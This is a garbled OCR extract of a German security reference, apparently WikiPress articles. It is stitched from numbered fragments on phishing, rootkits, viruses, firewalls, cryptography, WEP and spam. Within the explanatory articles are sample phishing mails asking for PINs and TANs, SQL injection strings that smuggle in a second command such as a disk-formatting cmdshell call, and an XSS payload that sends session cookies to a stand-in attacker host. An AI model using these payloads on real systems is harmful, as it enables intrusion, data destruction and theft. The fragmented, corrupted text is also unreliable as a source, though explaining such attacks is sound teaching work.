Bernd Schmeling danach bearbeitet von den Hauptautoren OS Frank A Steven Malkovich Maynard Tomreplay Ben Zin Priwo HenHei Kingruedi Rat Bernd Schmeling Stefan K hn TA Sadduk Waldgeist TekkenTec Darkone Heidas Henrik
479. sen Sie unsere Seite besuchen wo Ihnen angeboten wird eine spezielle Form auszufuellen In dieser Form werden Sie ZWEI FOL GENDE TAN CODEs DIE SIE NOCH NICHT VERWENDET HABEN EINTASTEN Achtung Verwenden Sie diese zwei Codes in der Zukunft nicht mehr Wenn bei der Mittelueberweisung von Ihrem Konto gerade diese TAN Codes verwendet werden so wird es fuer uns bedeuten dass von Ihrem Kon to eine nicht genehmigte Transitaktion ablaeuft und Ihr Konto wird unver zueglich bis zur Klaerung der Zahlungsumstaende gesperrt Diese Massnahme dient Ihnen und Ihrem Geld zum Schutze Wir bitten um Entschuldigung wenn wir Ihnen die Unannehmlichkeiten bereitet haben Mit freundlichen Gruessen Bankverwaltung Sie forderte den Empf nger auf einem Link zu folgen der angeblich auf die Seiten der Postbank f hren sollte tats chlich aber auf eine Phishingseite verwies Diese fragt in fehlerhaftem Deutsch nicht nur nach der PIN sondern bittet auch um die Mitteilung zweier TANs Nach Eingabe der Ziffern in die Formularfelder leitet die Webseite den Besucher weiter an die ffent liche Postbank Webadresse Die Eingabedaten erh lt nicht etwa die Bank sondern der Administrator der Phishingseiten 235 Angriffe Sehr geehrte Kundin sehr geehrter Kunde 9 wir begr en Sie zum neuen Online Banking der Postbank mit noch mehr Komto Jetzt neu Minutenaktuelle Ums tze Barrierefreiheit uvm Alle Neueungggau hen Blick Ihre Postbank
480. sen sich deshalb zunehmend mit den grundlegenden Fragen des tech nischen Datenschutzes Datensicherheit auseinandersetzen wenn sie Erfolg haben wollen Regelungen Internationale Regelungen Seit 1980 existieren mit den OECD Guide lines on the Protection of Privacy and Transborder Data Flows of Personal Data international g ltige Richtlinien welche die Ziele haben die mitglied staatlichen Datenschutzbestimmungen weitreichend zu harmonisieren einen freien Informationsaustausch zu f rdern ungerechtfertigte Han delshemmnisse zu vermeiden und eine Kluft insbesondere zwischen den europ ischen und den US amerikanischen Entwicklungen zu verhindern 1981 verabschiedete der Europarat mit der Europ ischen Datenschutz konvention eines der ersten internationalen Abkommen zum Datenschutz Die Europ ische Datenschutzkonvention ist bis heute in Kraft sie hat je doch lediglich empfehlenden Charakter Dagegen sind die Datenschutz richtlinien der Europ ischen Union f r die Mitgliedsstaaten verbindlich und in nationales Recht umzusetzen Europ ische Union Mit der Europ ischen Datenschutzrichtlinie haben das Europ ische Parlament und der Europ ische Rat Mindeststandards f r den Datenschutz der Mitgliedsstaaten festgeschrieben Die Richtlinie gilt je doch nicht f r den Bereich der justiziellen und polizeilichen Zusammenar beit so genannte 3 S ule der Union In Deutschland wurde die Richtlinie 15 berblick im Jahr 2001 mit
481. setzbar sollen z B wirklich sicher und vollst ndig vertrauliche Informationen aus dem Datenver kehr zu nicht autorisierten Systemen herausgefiltert werden so m sste u a das technische Problem gel st werden wie vertrauliche steganogra fische oder verschl sselte Informationen erkannt und gefiltert werden sollen Trotz der in aktuellen Firewall Systemen recht einfach gestalteten Regeln kann deren Ausf hrung sehr komplex werden H ufig m ssen einzelne Pakete zusammengesetzt werden damit der betrachtete Daten verkehr z B HTML Seite als Ganzes erkannt durchsucht und eventuell ver ndert werden kann Anschlie end muss der Datenverkehr wieder in einzelne Pakete zerteilt werden und kann dann weitergeschickt werden Anmerkung blicherweise ist das L schen von Viren Mails die Aufgabe von Vi renscannern Virenscanner durchsuchen u a den gesamten ausgehen den und eingehenden Datenstrom nach Viren und l schen diese bei positivem Befund Typischerweise ist dies nicht Aufgabe einer Fire wall Spam Mails werden von Spam Filtern gekennzeichnet Typischer weise ist dies nicht Aufgabe einer Firewall 90 Firewall Proxy Viele Firewallsysteme besitzen einen oder mehrere integrierte transparente Proxies die f r Client und Server weitgehend unbemerkbar sind und von der Firewall automatisch auf entsprechende Verbindungen angewendet werden Zweck dieser Proxies ist die vereinfachte Realisa tion der Protokollvalidierung und Anp
482. sgef hrt wird sobald die Firmware bzw das BIOS den Rechner in einen definierten Startzustand gebracht hat blicherwei se laden Boot Loader das installierte Betriebssystem und bergeben die sem die Kontrolle ber den Computer Wie beschrieben sind Boot Loader Programme die vor dem Betriebs system ausgef hrt werden und deshalb f r Viren sehr interessant Bootvi ren k nnen in das Betriebssystem das nach ihnen geladen wird eingrei fen und dieses manipulieren oder komplett umgehen Dadurch k nnen sie sich z B auf Bootsektoren eingelegter Disketten verbreiten L dt ein Rechner nicht den MBR der Festplatte sondern den infizierten Bootsektor einer Diskette versucht das enthaltene Bootvirus meist bis in den MBR der Festplatte vorzudringen um bei jedem Start des Computers ohne Diskette aktiv werden zu k nnen Bootviren haben jedoch mit den technischen Limitierungen die mit dem Bootsektor bzw vor allem MBR als Speicherort einhergehen zu k mpfen Sie k nnen maximal 444 Bytes gro sein sofern sie nicht noch weitere Teile auf anderen Teilen der Festplatte verstecken Der MBR ist nach Industrienorm einen Sektor also 512 Byte gro aber einige Bytes werden f r die Hardware und BIOS Kompatibilit t verbraucht Au er dem m ssen sie die Aufgaben des Boot Loaders bernehmen damit das System funktionsf hig bleibt was von dem ohnehin schon sehr geringen Platz f r die Virenlogik noch weiteren Platz wegnimmt Da sie vor einem Be
483. signaturschema die TP einsparen Ein Intel Mitarbeiter verglich das Prinzip mit der L sung eines Rubiks W rfels Er geht davon aus dass man einem Betrachter zun chst den ungeordneten und sp ter den geord neten W rfel zeigt So kann man einem Dritten jederzeit klarmachen den L sungsweg zu kennen ohne diesen Weg erl utern zu m ssen Das f r die 118 Trusted Platform Module anonyme Beglaubigung eingesetzte Verfahren benutzt sogenannte Zero Knowledge Protokolle die einem Verifizierer Diensteanbieter die G l tigkeit eines erzeugten AIK beweisen ohne dass dabei Wissen ber den korrespondierenden EK bzw Nutzer preisgegeben wird Durch diese Verbesserung wurde ein gewichtiger Kritikpunkt am Beglaubigungsver fahren beseitigt n mlich die aufwendige und kostspielige Attestation via Trusted Third Party Allerdings gibt es einen bestimmten Betriebsmodus Fixed Base Pseudonym Rogue Tagging welcher auf Wunsch des Veri fizierers das Erkennen einer wiederholten oder missbr uchlichen Nut zung erlaubt Damit wird leider auch eine Verfolgung aller mit diesem AIK durchgef hrten Dienstanforderungen m glich was letztendlich zur Identifizierung des Nutzers f hren k nnte Sicherer Zufallsgenerator Die TCG Spezifikation garantiert einen si cheren Zufallsgenerator auf dem TPM Damit wird ein allgemeines Pro blem der Informatik bei der Gewinnung von Zufallswerten per Software angegangen Die beschrittenen Wege wie Bewertung zuf ll
484. sinternals am 31 Okto ber 2005 bekannt wurde dass der Sony Kopierschutz f r Musik CDs sich mit Methoden eines Rootkits in Windows Systemen einnistet Entwicklung Die ersten Sammlungen von Unix Tools zu oben genannten Zwecken be standen aus modifizierten Versionen der Programme ps passwd usw die dann jede Spur des Angreifers die sie normalerweise zeigen w rden verbargen und es dem Angreifer so erm glichten mit den Rechten des Sys temadministrators root zu agieren ohne dass der wirkliche Administrator dies bemerken konnte Der Name Rootkit entstand also aus der Tatsache dass der Angreifer sich die Root Rechte Admin Rechte aneignet und dazu ein Kit engl Baukasten aus verschiedenen Programmen auf dem angegriffenen Rechner installiert und ausf hrt Funktionsweise Ein Rootkit versteckt normalerweise Logins Prozesse und Logs und ent h lt oft Software um Daten von Terminals Netzwerkverbindungen und der Tastatur abzugreifen Dazu k nnen Backdoors Hintert ren kom men die es dem Angreifer zuk nftig erleichtern auf das kompromittierte System zuzugreifen indem beispielsweise eine Shell gestartet wird wenn an einen bestimmten Netzwerkport eine Verbindunganfrage gestellt wur de Die Grenze zwischen Rootkits und Trojanischen Pferden ist flie Bend Es gibt zwei gro e Gruppen von Rootkits Bei Application Rootkits werden einfach legitime Programmdateien durch modifizierte Versionen ersetzt Diese Rootkits sind jedo
485. soll dies illustrieren Erwarteter Aufruf Aufruf http webserver cgi bin find cgi ID 42 Erzeugtes SQL SELECT author subjekt text FROM artikel WHERE ID 42 SQL Injektion Aufruf http webserver cgi bin find cgi ID 42 UPDATE USER SET TYPE admin WHERE ID 23 Erzeugtes SQL SELECT author subjekt text FROM artikel WHERE ID 42 UPDATE USER SET TYPE admin WHERE ID 23 Wie man erkennen kann wird dem Programm ein zweiter SQL Befehl untergeschoben der die Benutzertabelle modifiziert 216 SQL Injektion Datenbank Server ver ndern Auf einem Webserver findet sich das Script search aspx zum Suchen nach Webseiten Das Script akzeptiert den Parameter keyword welcher sp ter Bestandteil des SQL Befehls wird Folgende Tabelle soll dies illustrieren Erwarteter Aufruf Aufruf http webserver search aspx keyword sql Erzeugtes SQL SELECT url title FROM myindex WHERE keyword LIKE sql SQL Injektion Aufruf http webserver search aspx keyword sql GO EXEC cmdshell format C Erzeugtes SQL SELECT url title FROM myindex WHERE keyword LIKE sql GO EXEC cmdshell format C Hier wird der eigentlichen Abfrage ein weiterer Befehl angeh ngt Die zwei Bindestriche kommentieren das Hochkomma als berbleibsel der eigentlichen Anfrage aus Der Befehl erm glicht das Formatieren der Festplatte aber auch Downloads oder hnliches lassen sich dadurch er zeugen Aussp hen von Daten Auf manchen SQL Implementationen
486. spider wie der Google Suchroboter miss braucht um serverseitige XSS und SQL Injektion Attacken auszuf h ren Hierzu wird ein pr parierter Link auf einer Webseite ver ffentlicht Sobald ein Webspider diesem Link folgt l st er die Attacke aus Dadurch taucht die IP Adresse des Spiders und nicht die des eigentlichen Angrei fers in den Protokollen des angegriffenen Systemes auf Schutz Um eine Webanwendung vor XSS Angriffen zu sch tzen m ssen alle eingehenden Parameter als unsicher betrachtet und vor der Verwendung entsprechend gepr ft werden Hier treffen die Zitate eines Microsoft Mit arbeiters zu der ein Buch Never trust the client und sein n chstes bereits All incoming data is EVIL nannte Wie kann man diese Klimax erkl ren Jegliche Daten die einmal beim Client d h beim Besucher der Website waren sind potenziell verseucht So k nnte sich beispielsweise ein Mitglied in einem Forum hallo lt script gt alert test lt script gt nennen 223 Angriffe Werden die in dem String enthaltenen Steuerzeichen lt gt und und Tags lt script gt vor der Ausgabe an den Browser nicht in HTML bersetzt in PHP beispielsweise per htmlspecialchars so f hrt der Browser sie als JavaScript aus Der Betrachter der Seite sieht lediglich als Anzeige hallo erh lt jedoch eine nervige Box mit der Schrift test M glich hierbei w re z B auch im Benutzernamen JavaScript Code einzuf gen mit dessen Hil fe man das Se
487. ssages nicht imstande zu vereiteln dass als Folge von Spam Diskussionen ber den Spam die zum Thema der jeweiligen Newsgroup gar nicht passen die Newsgroup unleserlich machen Moderierte Newsgroups Die Beitr ge gelangen nicht unkontrolliert ins Usenet sondern werden von einem Moderator abgefertigt der Spam abfangen kann Es gelingt nicht immer einen Freiwilligen f r dieses Amt zu finden Die ehemals sehr erfolgreiche Stellenanzeigen News group misc jobs offered musste aus diesem Grund abgeschafft werden Serverseitige Ma nahmen Newsserver Software l sst sich mit Add Ons erg nzen die Spam erkennen und zur ckweisen Clientseitige Ma nahmen Die meisten Newsreader verf gen ber ein so genanntes Killfile das steuert was man zu sehen bekommt Der Bayessche Filter sortiert erw nschte und unerw nschte E Mails nach einem Training durch den Benutzer des E Mail Clients Wegwerf E Mail Adressen Bei der Verwendung von Wegwerf E Mail Adressen gibt der Benutzer anstelle seiner eigenen Adresse eine tem por re g ltige E Mail Adresse an Der Benutzer h lt seine eigentliche Adresse somit anonym und verhindert dass sein E Mail Konto mit Spam zugedeckt wird Spam Phishing Mails Hier wird versucht an vertrauliche Daten des Emp f ngers zu kommen blicherweise behauptet die Mail von einem dem Empf nger bekannten Unternehmen oder Anbieter zu sein und enth lt Links zu den vermeintlichen Einstiegsseiten Wird diese Art Betrugsmail
488. ssel auf einem sicheren Weg bermittelt werden Dies kann sehr aufw ndig werden wenn die Beteiligten weit auseinander wohnen Mit dem ffentlichen Schl ssel kann dieses Problem ohne weiteres ignoriert werden da nicht er sondern der private Schl ssel das Geheimnis tr gt Voraussetzung daf r ist aber dass der ffentliche Schl ssel echt ist und nicht von einem Man In The Middle vorget uscht wird Dies versucht man mit dem Einsatz von Zertifizierungsstellen Wenn man mit vielen Beteiligten kommuniziert von jedem einen Schl ssel bekommt und auch f r jeden einen eigenen Schl ssel generiert steigt die Anzahl zu verwaltender Schl ssel bei einem symmetrischen 279 Kryptografie Kryptosystem sehr schnell an Die Schl ssel m ssen ja auch geheim ge halten werden Da beim asymmetrischen Kryptosystem alle Kommu nikationspartner nur einen ffentlichen Schl ssel der einzelnen Partner besitzen und nur ihren eigenen privaten Schl ssel geheim halten m ssen nimmt der Aufwand f r die Schl sselverwaltung ab Nachteile Im Vergleich zu symmetrischen Algorithmen arbeiten die asymmetrischen Algorithmen extrem langsam In der Praxis wird dieses Problem dadurch umgangen dass hybride Verfahren eingesetzt werden Ein anderes Problem ist dass die Sicherheit vieler asymmetrischer Kryptosysteme auf unbewiesenen Annahmen beruht Es wird lediglich stark vermutet dass die den verschiedenen Verfahren zugrundeliegen den Einwegfunktionen nur
489. sselte Nachricht wird ber ein Compu ternetzwerk bertragen Man unterscheidet dabei zwei grundlegend un terschiedliche bertragungsweisen Bei der Leitungsverschl sselung wird die Nachricht nur jeweils f r den Nachbarcomputer verschl sselt Dieser entschl sselt die Nachricht verschl sselt sie wiederum mit einem m glicherweise anderen Ver fahren und schickt sie an seinen Nachbarn und so weiter bis zum Zielrechner Der Vorteil dieses Verfahrens besteht darin dass sich je weils nur Nachbarrechner auf ein Verschl sselungsverfahren und ver wendete Schl ssel einigen m ssen Dar ber hinaus kann diese ber tragungsweise auf einer sehr niedrigen Protokollebene etwa bereits in der bertragungshardware angesiedelt werden Der Nachteil besteht darin dass jeder einzelne Rechner auf dem bertragungsweg vertrau ensw rdig und sicher sein muss Bei der Ende zu Ende Verschl sselung wird die Nachricht vom Absen der verschl sselt und in dieser Form unver ndert ber mehrere Rech ner hinweg zum Empf nger bertragen Hier hat keiner der bertra genden Rechner Einsicht in den Klartext der Nachricht Der Nachteil besteht allerdings darin dass sich der Absender mit jedem m glichen Empf nger auf ein Verschliisselungsverfahren und zugeh rige Schl s sel einigen muss Verwandte Begriffe Chiffrierung Bei der Chiffrierung werden alle Zeichen einzeln anhand eines Verschl sselungsverfahrens verschl sselt Beispiel hierf r ist d
490. ssioncookie des Benutzers an einen fremden Rechner schickt Horst lt script gt new Image src http www boeserechner de s c php c escape document cookie lt script gt Folgerich tig darf eine HTML Eingabe eines Benutzers nicht unversehens an ande re Benutzer zuriickgeschickt werden Auch das Verbot des lt script gt Tags f hrt nicht zum Erfolg da auch diverse andere Tags f r XSS missbraucht werden k nnen Durch Ausschalteten von JavaScript Active Scripting im Browser kann man sich gegen clientseitige XSS Angriffe sch tzen Allerdings bie ten einige Browser weitere Angriffsvektoren Quelle http de wikipedia org wiki Cross Site_Scripting Historie 2 2 04 Angelegt von Echoray danach bearbeitet von den Hauptautoren Echoray Fabian Bieker Shurakai Togs Hendrik Brummermann Achim Raschka Steven Malkovich H P Vlado Marsupilami anonym 12 1 06 1 2 06 WikiPress Redaktion KGB Hack Der KGB Hack ist die Bezeichnung f r eine Reihe von Einbr chen in ver schiedene westliche Computersysteme zwischen 1985 und 1989 Es war die Tat einer Hannoverschen Hackergruppe um Karl Koch und Markus Hess Geschichte Auf dem regelm ig stattfindenden Hacker Treff im Hannoverschen Restaurant Bistro Casa lernt Karl Koch der sich in der Szene Hagbard Celine nennt 1985 den Hacker Dirk Breschinski alias DOB kennen Nach dem sie gemeinsam einige Hacks durchgef hrt haben gelangt Koch ber ihn an den Croupier Pedro b rger
491. st nde ab einer Dicke von 12 5 cm zu echten Wellenbrechern Je st rker die elektrische Leitf higkeit des Mate rials desto st rker der Effekt Au erdem k nnen leitende Gegenst nde in der N he von Antennen deren Richtcharakteristik stark beeinflus sen WLAN nach 802 11a maximal 54 Mbit sbrutto funktim5 GHz Band in dem ein gr erer Frequenzbereich 455 MHz zur Verf gung steht und damit 19 nicht berlappende Frequenzen in Deutschland nutzbar sind Auch dieser Frequenzbereich ist in Deutschland lizenzfrei nutzbar Im Normalbetrieb nach 802 1la sind 30 mW Sendeleistung erlaubt Unter strengeren Auflagen TPC Transmit Power Control und DFS Dynamic Frequency Selection sind h here Sendeleistungen bis 1000 mW gestattet TPC und DES sollen sicherstellen dass Satellitenverbindungen und Ra darger te nicht gest rt werden World Radio Conference 2003 Dies und die h heren Kosten der Hardware auf Grund der h heren Frequenz bewir ken dass sich 802 11a noch nicht gegen 802 11b oder g durchgesetzt hat Mit speziellen Richtfunkantennen lassen sich bei Sichtkontakt mehre re Kilometer berbr cken Hier werden teilweise irrsinnige Rekorde mit Verbindungen ber mehrere hundert Kilometer ohne aktiven Verst rker abgesehen von den Antennen erzielt Allerdings funktioniert das nur zwischen hohen Bergen auf dem Meer endet nach etwa 30 km durch die Erdkr mmung der Sichtkontakt Antennen bringen einen Sende wie Empfangs Gewinn Antenn
492. st sich der Einsatz von WEP nicht ver meiden sollten folgende Ma nahmen beachtet werden um Angriffe so genannter Scriptkiddies und zuf llige Zugriffe fremder Personen auf das WLAN zu unterbinden das Standard Passwort des Access Points ndern der WEP Schl ssel sollte mindestens 128 Bit lang sein und eine lose Kombination aus Buchstaben Ziffern und Sonderzeichen sein 250 Wi Fi Protected Access die Zugriffskontrollliste ACL Access Control List aktivieren um vom Access Point nur Endger te mit bekannter MAC Adresse zuzulassen Alle diese Sicherheitsma nahmen d rfen aber nicht dar ber hinwegt u schen dass diese letztlich keinen wirklichen Schutz bedeuten Ein erfolg reicher Angriff auf die WEP Verschl sselung ist trotz all dieser Vorkeh rungen mit den richtigen technischen Voraussetzungen innerhalb von 5 bis 10 min mit ziemlicher Sicherheit erfolgreich Einsatz Aufgrund der Schwachstellen empfehlen Netzwerktechniker den Verkehr ber den Access Point ber eine zus tzliche Verschl sselung abzusichern In der Praxis wird dies h ufig durch ein VPN gel st Als Nachfolger f r das unsichere WEP gilt WPA Wi Fi Protected Access bzw dessen Verbesserung WPA2 als IEEE 802 11i Standard Bei der Absicherung durch ein VPN wird wahlweise nur die Nutzlast oder das gesamte Datenpaket verschl sselt Da WEP dann keinerlei zu s tzlichen Sicherheitsgewinn mehr bringt kann es nach dem KISS Prin zip abgeschaltet werden um
493. stemen bereits ein Standard Einwahlprogramm f r Verbindungen nach dem Point to Point Protocol PPP mitgeliefert Bei Windows nennt es sich DF Netzwerk Das Einwahlprogramm muss gestartet werden wenn man eine Internet Verbindung aufbauen m chte und so lange laufen bis man die Verbin dung nicht mehr ben tigt und diese schlie t Viele Provider bieten Installations CDs an die es unerfahrenen Kun den vereinfachen sollen einen passenden Internetzugang einzurichten Dies geschieht entweder dadurch dass ein Eintrag im DF Netzwerk des Windows Betriebssystems erstellt wird oder aber dadurch dass ein firmenspezifisches Einwahlprogramm zum Beispiel die AOL Software installiert wird Oft wird dabei im weiteren Sinne nicht nur das Einwahl programm selbst sondern auch dessen Installationsprogramm als Dialer bezeichnet Premium Rate Dialer Premium Rate Dialer auch Webdialer oder 0900 Dialer genannt fr her 0190 Dialer dienen dazu kostenpflichtige Online Mehrwertdienste zu vermarkten und Geldbetr ge im Internet abzurechnen Solche Di alernummern erkennt man seit dem 1 Januar 2006 an der Ziffer 9 0900 9 Zur Abrechung solcher Mehrwertdienste wurden spezielle Einwahl nummern eingerichtet Diese waren zun chst nur daf r gedacht z B Wettervorhersagen oder Gewinnspiele ber die Telefonrechnung abzu rechnen Dazu w hlte sich der Kunde ber eine 0900 Telefonnummer ein und lie sich die Kosten ber die Telefonrechnung abb
494. t Aushandeln zu benutzender kryptografischer Algorithmen und Schl s sel TLS unterst tzt auch eine unverschl sselte bertragung Der Handshake selbst kann in vier Phasen unterteilt werden Phase 1 Der Client schickt zum Server ein client_hello und der Server antwortet dem Client mit einem server_hello Die Parameter der Nach richten sind eine Zufallszahl die sp ter verwendet wird um den pre master secret zu bilden sie sch tzt damit vor Replay Attacken die h chste vom Initiator der Nachricht beherrschte SSL Version eine Ses sion ID und die zu verwendende Cipher Suite Phase 2 Die Phase ist optional Der Server identifiziert sich gegen ber dem Client Hier wird auch das X509v3 Zertifikat zum Client ber mittelt 320 Transport Layer Security Phase 3 Die Phase ist optional Hier identifiziert sich der Client gegen ber dem Server Auch hier kann das X509v3 Zertifikat des Client bermittelt werden Der Client versucht au erdem das Zertifikat das er vom Server erhalten hat zu authentifizieren bei Misserfolg wird die Verbindung ab gebrochen Dieses Zertifikat enth lt den ffentlichen Schl ssel des Ser vers Das pre master secret wird hierbei falls die Cipher Suite RSA ist durch den im Zertifikat bekannten ffentlichen Schl ssel ausgetauscht Hierbei kann auch das Diffie Hellman Verfahren verwendet werden Phase 4 Diese Phase schlie t den Handshake ab Aus dem vorhanden pre master secret kann das Master S
495. t Wie weit dieses Recht geht ist noch nicht gericht lich gekl rt 121 Software Kritik und Nachteile Personen die eine kopiergesch tzte Audio CD auf legale Weise erworben haben m ssen gegen ber der illegalen Kopie folgende Nachteile in Kauf nehmen Der legal erworbene Tontr ger l sst sich nicht berall abspielen Bei Autoradios DVD Playern und sogar HiFi Anlagen kann die Wieder gabe gest rt oder unm glich sein Die Wiedergabe auf einem Computer ist nur sehr eingeschr nkt m g lich Oft kann die Audio CD nicht abgespielt werden oder nur ber eine spezielle Software mit deutlich veringerter Qualit t mit Bitraten weit unter 128 Kbps normal w ren 1400 Kbps Das Umwandeln einer kopiergesch tzten CD in ein anderes Musik format z B mp3 um die gekaufte CD auch auf einem mp3 Player zu h ren oder das Anfertigen einer Privatkopie wird durch den Kopier schutz nicht nur erschwert Das Gesetz verbietet das Umgehen eines Kopierschutzes je nach Land Einige Kopierschutz Techniken arbeiten mit falschen Fehlerkorrektur Werten siehe vorangehende Beispiele dies kann bei leicht zerkratzten CDs schneller zu Wiedergabefehlern f hren Die Klangqualit t ist wegen bewusst eingebauter Fehler vermindert Kopiergesch tzte CDs entsprechen nicht dem von Philips im so genannten Red Book festgelegten Compact Disc Digital Audio CD DA Standard Sie sind somit keine Audio CDs und d rfen auch nicht als solche bezeichnet werden Quel
496. t mehr er reichbar Allerdings ist der Webserver der SCO Group noch erreichbar Die offiziellen Hostnamen wurden im DNS gel scht 67 Viren W rmer Trojaner 3 Februar 2004 Die zweite Denial of Service Attacke gegen Micro soft beginnt Aufgrund des Programmfehlers der B Variante von My doom und der damit verbundenen geringeren Verbreitung halten sich die Angriffe jedoch im Rahmen und Microsoft kann seine Webseite weiter betreiben 6 Februar 2004 Ein neuer Computerwurm mit dem Namen Dead hat wird zum ersten Mal vereinzelt gesichtet Der neue Wurm nutzt die von Mydoom eingerichtete Backdoor aus und bef llt ber diesen Weg Windows Computer die mit dem Mydoom Wurm infiziert sind Dabei deinstalliert er die vorhandenen Mydoom W rmer deaktiviert Firewall und AntiViren Software und versucht sich auf anderen Windows PCs weiter zu verbreiten Mit Hilfe einer neu eingerichteten Backdoor k nnen Angreifer beliebige Programme auf die von Deadhat befallenen Windows Rechner hochladen und dort ausf hren 7 Februar 2004 Die deutsche Seite von SCO www sco de ist wieder erreichbar Die Hauptseite www sco com ist nach wie vor offline 12 Februar 2004 Mydoom A soll seine weitere Verbreitung pro grammgesteuert einstellen Die von Mydoom A eingerichtete Back door bleibt jedoch weiterhin offen 1 M rz 2004 Mydoom B soll seine weitere Verbreitung programm gesteuert einstellen Aber auch hier soll die Backdoor weiterhin offen bleiben 27
497. t mit einer festen Blockgr e und ver bzw entschl sselt mehrere Zeichen in einem Schritt Der gro e Nachteil symmetrischer Verfahren liegt in der Nutzung ein und desselben Schl ssels zur Ver und Entschl sselung Ist der Schl ssel einem Angreifer bekannt ist es f r ihn ein Leichtes an Information zu ge langen und Fehlinformationen durch Ver nderung der Originalnachricht zu verbreiten Ein weiteres typisches Problem beim Einsatz von symme trischen Verfahren ist wie der Schl ssel erstmals ber unsichere Kan le bertragen werden kann blicherweise kommen hierf r dann asymme trische Kryptosysteme zum Einsatz basierend auf dem Diffie Hellman Algorithmus womit einige Vorteile beider ausgenutzt und einige Nachtei le beider ausgemerzt werden k nnen beispielsweise die Kombination der schnelleren symmetrischen Verschl sselung mit dem Wegfallen des Zu griffs eines Angreifers auf den ungesch tzten Schl ssel durch die asym metrische Verschl sselung ber einen unsicheren Kanal Die ersten angewandten kryptografischen Algorithmen waren alle symmetrische Verfahren und finden schon Erw hnung zu Julius C sars Zeiten Geheimer Schl ssel Geheim i Klar text es text Verfahren AES Advanced Encryption Standard oder Rijndael der US ameri kanische Verschl sselungsstandard Nachfolger des DES von Joan 276 Asymmetrisches Kryptosystem Daemen und Vincent Rijmen entwickeltes Blockverschl sselungsver fahren DES Dat
498. t vieler Menschen vor Computerviren Bedingungsteil Der Bedingungsteil ist daf r verantwortlich dass der Schadensteil ausgef hrt wird Er ist in den meisten Computer viren mit einem Schadensteil enthalten Viren ohne Bedingungsteil f hren den Schadensteil entweder bei jeder Aktivierung oder in ganz seltenen F llen niemals aus Der Bedingungsteil Trigger kann zum Beispiel das Payload an einem bestimmten Datum aus f hren oder bei bestimmten Systemvoraussetzungen Anzahl der Dateien Gr e des freien Speicherplatzes ect oder einfach zuf l lig Tarnungsteil Ein Tarnungsteil ist nur in wenigen komplexen Viren vorhanden Er kann das Virus zum Beispiel verschl sseln oder ihm eine andere Form geben Polymorphismus Metamorphismus Dieser Teil dient zum Schutz des Virus vor der Erkennung durch Anti Viren Software Es gibt aber nur eine sehr geringe Anzahl von Viren die nicht vollst ndig erkannt werden k nnen z B Win32 ZMist ACG Win32 MetaPHOR oder OneHalf Achillesferse eines Virus Damit ein Virenscanner ein Virus identifi zieren kann ben tigt er dessen Signatur Ein Virus versucht ein System zu infizieren und dies geschieht z B bei einem Linkvirus durch das An h ngen an ein bestehendes Programm Dabei muss es abgesehen von berschreibenden Viren zuerst pr fen ob es dieses Programm bereits infiziert hat sprich es muss in der Lage sein sich selbst zu erkennen W rde es dies nicht machen k nnte es ein Pr
499. t zu bestatigen Dafuer mussen Sie unseren Link unten besuchen wo Ihnen eine spezielle Form zum Ausfullen angeboten wird https banking postbank de app cust_details_confirmation_page do Diese Anweisung wird an allen Bankkunden gesandt und ist zum Erfullen erforderlich Wir bitten um Verstandnis und bedanken uns fur die Zusammenrbeit c 2005 Deutsche Postbank AG Anf nge des Phishings Phishing ist keine neue Erscheinung Tats chlich gab es unter dem Be griff Social Engineering hnliche Betrugsversuche bereits lange bevor E Mail und Internet zum allt glichen Kommunikationsmittel wurden Hier versuchten die Betr ger auf telefonischem Weg sich das Vertrauen der Opfer zu erschleichen und ihnen vertrauliche Informationen zu ent locken Neu sind beim Phishing lediglich die Werkzeuge die eine weitaus gr ere Verbreitung erm glichen Die Anf nge des Phishings im Internet reichen bis zum Ende des 20 Jahrhunderts zur ck Damals wurden Nutzer von Instant Messengern wie z B ICQ per E Mail aufgefordert ihre Zugangsdaten in ein in der E Mail enthaltenes Formular einzutragen Mit den so erhaltenen Zugangsdaten konnten die Betr ger die Chat Zug nge ihrer Opfer unter deren Identit t nutzen Quelle http de wikipedia org wiki Phishing Historie 1 6 04 Angelegt von Shannon danach bearbeitet von den Hauptautoren Hendrik vm Kabelsalat Anton Shannon Bohem Heckmotor Namex KSebi Rigoice Musik chris Tischra Steven Malkovi
500. tark verdr ngt Ang Melogread de 182 E Mail In Deutschland wurden am 2 August 1984 die angeblich ersten Internet E Mails empfangen und gesendet Der Karlsruher Internetpionier Werner Zorn beantwortete den offiziellen Willkommensgru des US amerikani schen CSNet einer hersteller bergreifenden Plattform zur elektronischen Kommunikation von Wissenschaftlern Heute 2005 werden E Mails vorwiegend per SMTP ber das Internet und in lokalen Netzen bertragen lediglich X 400 ein offener weltweiter Standard wird daneben noch ernsthaft benutzt Die erste gro e E Mail Diskussionsgruppe dieim ARPANET entstand war die SF LOVERS Liste in der sich eine Reihe von ARPA Forschern an ffentlichen Diskussionen ber Science Fiction beteiligte Rheingold 1994 SF LOVERS tauchte in den sp ten 1970er Jahren im ARPANET auf Zun chst wurde versucht dagegen einzuschreiten weil derartige Aktivi t ten selbst bei liberalster Auslegung mit Forschung wenig zu tun hatten F r einige Monate wurde die Liste deshalb gesperrt Schlie lich wurden die Verantwortlichen der ARPA aber mit dem Argument berzeugt dass SF LOVERS ein wichtiges Pilotprojekt zur Erforschung der Verwaltung und des Betriebs gro er Mailinglisten war Hauben 1993 Die Systemin genieure mussten das System wiederholt umbauen damit es das explosi onsartig ansteigende Nachrichtenaufkommen bew ltigen konnte Technische Details Aufbau einer E Mail Wie beschrieben bestehe
501. tatten Auch hierf r gibt es ffentliche Daten banken meist lassen sich Einwahlzug nge auch leicht anhand des Do mainnamens erkennen So genannte Teergruben k nnen das Abliefern von UBE nicht verhindern bieten aber eine Gegenma nahme gegen den Versandmechanismus der T ter indem sie mit u erst langsamen Reaktionen eine UBE versenden de Gegenstelle bei der Arbeit aufhalten Die Kommunikation zwischen empfangenden System und dem UBE Sendesystem wird quasi z hfl ssig wie Teer anstatt nur Sekundenbruchteile dauert Versandvorgang mehrere Minuten Bei White Blacklist Filtern antwortet das Mailsystem zun chst allen unbekannten Versendern und fordert diese h flichst auf sich beim Mail Transfer Agent zu registrieren Durch eine Aktion z B eine Zahl aus ei nem generierten Bild abschreiben best tigt der Sender dass er ein Mensch ist und ernsthaftes Interesse hat Wenn er korrekt antwortet bekommt der Empf nger die bis dahin aufgehobene Mail zugesandt Der Versen der wird daraufhin in die Whitelist aufgenommen Lehnt der Empf nger 197 Sonstige Themen den Absender jedoch trotzdem ab sendet er eine Mail mit dem Subject eer SPAM an den Absender Der W B Filter f ngt diese Mail ab und verschiebt dann die Adresse von der Whitelist auf die Blacklist Einge hende Mails der Blacklist werden verworfen beziehungsweise automatisch beantwortet Es gibt noch 